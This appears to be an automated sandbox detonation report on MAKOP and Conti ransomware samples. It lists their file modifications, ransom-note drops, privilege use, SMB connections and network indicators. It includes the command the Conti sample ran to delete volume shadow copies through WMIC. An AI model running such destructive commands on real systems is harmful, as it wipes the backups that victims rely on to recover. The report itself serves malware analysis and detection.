"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 95.100.245.168:80 | x2.c.lencr.org | tcp |
Files
\Users\Admin\AppData\Local\Temp\nso8B5F.tmp\System.dll
| MD5 | fccff8cb7a1067e23fd2e2b63971a8e1 |
| SHA1 | 30e2a9e137c1223a78a0f7b0bf96a1c361976d91 |
| SHA256 | 6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e |
| SHA512 | f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c |
memory/2812-7-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2812-10-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2812-9-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2812-16-0x0000000000400000-0x000000000041F000-memory.dmp
Analysis: behavioral14
Detonation Overview
| Submitted | 2024-07-07 14:07 |
| Reported | 2024-07-07 14:38 |
| Platform | win10v2004-20240704-en |
| Max time kernel | 1709s |
| Max time network | 1164s |
Command Line
Signatures
Conti Ransomware
Renames multiple (7310) files with added filename extension
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
Reads user/profile data of web browsers
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\3D Objects\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\110.0.5481.104\VisualElements\SmallLogoCanary.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_fr_135x40.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\OMML2MML.XSL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-140.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\legal\javafx\jpeg_fx.md | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\new_icons.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\lua\meta\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\110.0.5481.104\Locales\de.pak | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_hover.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_selected_18.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Trial-pl.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\sdxs\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\ISO690Nmerical.XSL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\da.pak | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fil_get.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check_2x.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-pl.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\Xusage.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD.HXS | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\selector.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Common Files\microsoft shared\ink\fi-FI\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-phn.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\jre\lib\jfr\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hi.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ul-phn.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ug.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O17EnterpriseVL_Bypass30-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4236 wrote to memory of 4088 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 4236 wrote to memory of 4088 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 4088 wrote to memory of 2648 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\wbem\WMIC.exe |
| PID 4088 wrote to memory of 2648 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\wbem\WMIC.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{A958BAE6-B132-4B07-8587-5D3813184B5D}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{A958BAE6-B132-4B07-8587-5D3813184B5D}'" delete
Network
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
